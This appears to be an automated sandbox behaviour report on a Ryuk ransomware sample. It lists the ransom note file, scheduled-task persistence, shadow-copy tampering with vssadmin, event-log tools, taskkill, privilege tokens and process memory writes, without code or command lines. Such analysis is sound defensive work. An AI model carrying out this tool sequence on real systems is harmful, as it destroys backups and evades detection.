Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\RyukReadMe.txt C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
File created C:\Windows\hrmlog1 C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1432 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1412 wrote to memory of 828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1412 wrote to memory of 828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1412 wrote to memory of 828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1412 wrote to memory of 828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 576 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 576 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 576 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 268 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 268 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 268 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 268 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1432 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1176 wrote to memory of 520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1176 wrote to memory of 520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1176 wrote to memory of 520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1176 wrote to memory of 520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 668 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 668 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 668 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 668 wrote to memory of 308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1432 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 572 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 572 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 572 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 572 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1432 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1432 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1716 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1716 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1716 wrote to memory of 1784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

